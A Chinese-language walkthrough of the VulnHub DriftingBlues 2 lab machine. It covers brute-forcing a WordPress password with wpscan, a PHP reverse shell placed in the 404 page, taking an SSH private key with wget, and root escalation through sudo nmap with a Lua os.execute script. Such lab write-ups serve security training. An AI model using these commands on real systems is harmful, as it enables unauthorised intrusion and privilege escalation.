​vbox导入，网络桥接。

靶机下载地址：https://download.vulnhub.com/driftingblues/driftingblues2.ova

一：信息收集

1；主机发现。

2；开放服务端口。ftp匿名登录。

3；ftp匿名登录的一张图片。

4；把图片复制到kali里面，利用工具steghide 查看一下图片里的信息，需要密码，emmmm,什么都没有。

5；没发现其他，我们目录遍历一下。

nikto -h http://192.168.1.23  新扫描目标站点下有无目录的工具

6；一个登录框。添加本地host，因为/blog源码里面有个域名。

192.168.1.23 driftingblues.box

​

6；一个登录框。添加本地host，因为/blog源码里面有个域名。by albert?可能是用户名。

192.168.1.23 driftingblues.box，在hosts添加。

那就用wp-scan工具扫描一下有没有用户名或者可利用的插件。确定是albert是用户名。

wpscan --url http://192.168.1.23/blog/ -e u 

7；爆破一下这个用户的密码。albert/scotland1

wpscan --url http://192.168.1.23/blog/ --passwords /usr/share/wordlists/rockyou.txt --usernames albert

​

8；登录成功。

1；往404页面写个PHPshell进去，保存，凯莉开启监听，访问一个不存在的路径。

2；监听成功。升级一下shell。

3；在home目录下发现一个freddie用户，还发现了.ssh的文件，进入 .ssh 文件夹，发现存在公私钥信息文件，且私钥文件可读可执行。

​

可以直接复制粘贴到文件上去。

也可以开服务，卡莉下载私钥文件。

python2 -m SimpleHTTPServer 9998

wget http://192.168.1.23:9998/id_rsa 

4；利用私钥文件，登录freddie用户，

​

5；看到有root权限，nmap提权。提权成功，两个flag。

https://gtfobins.github.io/查找nmap

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF

​使用 python 切换 bash：python3 -c 'import pty; pty.spawn("/bin/bash")'